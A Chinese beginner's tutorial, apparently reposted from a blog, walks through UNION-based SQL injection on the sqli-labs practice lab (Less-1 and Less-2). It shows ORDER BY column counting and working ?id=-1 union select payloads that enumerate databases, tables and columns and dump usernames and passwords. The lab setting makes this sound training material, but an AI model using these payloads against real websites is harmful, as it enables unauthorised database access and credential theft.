【内含环境下载】【原理性零基础】【数字型注入】mysql 靶场sqlilab sql注入原理讲解 第一章
环境小皮面板
https://www.xp.cn/
sqli-lab
链接:https://pan.baidu.com/s/1I0IxI0EdCzuht1FgrQHFfA?pwd=3f2s
提取码:3f2s
–来自百度网盘超级会员V8的分享
介绍
首先了解下原理性,以下使用了mysql语句但是id这个参数是外部传入的,是可控的,没有做安全过滤的
利用他没有做好过滤的外部传入参数进行拼接的特性我们就可以进行sql注入,
且顺序为数据库 -> 表 -> 字段 -> 数据
Less-1
接着来到sql查询工具中我们可以看到
正常查询
SELECT * FROM users WHERE id='1’的结果也就是?id=1的结果,以下分别为数据库和网页
已经找到了users表中id为1的用户
账户为Dumb 密码 为Dumb
现在我们开始构造恶意语句
可以看到Limit 0,1已经被注释掉了 显示为绿色,上面这个语句就等效于下面这个语句
成功绕过了Limit的显示限制
判断表的字段数
通过order by进行判断
如果order by 后面的数字大于现有的就会报错
由此可见我们表中的字段是小于四个
然后我们接着尝试3
可以看见下面有回显了,那么我们就可以判断我们的表一共有三个字段
此时我们就可以开始查询数据库当中的内容了
Less-2
接下来我们来到less2 进行 测试一下
查询数据库
/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
注意前面的-1 因为第一个字段是固定的,我们正确查询了就会显示对于id的用户名和密码
所以我们要让他不显示 即 输入一个不存在的值
然后就是前面的1 是为了占位
原本的位置被Welcom挡住了,下面是数据查询的图可以参考一下
限制我们已经知道他的数据库名了,我们要开始查询下面的表名
查询数据库中的表名
数据库 -> 表 -> 字段 -> 数据
//数据库执行的语句
select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘数据库’
//网页进行注入的语句
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘数据库’
如果我们不知道情况需要一个一个挨着数据库进行查询
mysql没有security这个数据库,我们知道他是sqlilab的数据库
我们直接看,其他的查询语句我也放在图中让大家参考理解
接下来我们就需要从数据库的表中获取我们所需要的列名了,随之就可以获取数据
查询表中的列名
//数据库执行语句
select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘表名’
//网页进行sql注入的语句
/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘表名’
这个user一看就不对劲,基本是我们想要的
(当然这是建立在知道的情况下,一般情况还需要确认下
接下来我们直接使用group_concat把所有的列名拼接起来
查询数据
//sql数据库执行语句
select 1,group_concat(username),group_concat(password) from users
//网页sql注入语句
/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users
原文地址:https://blog.csdn.net/zzxx191z/article/details/140233009
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!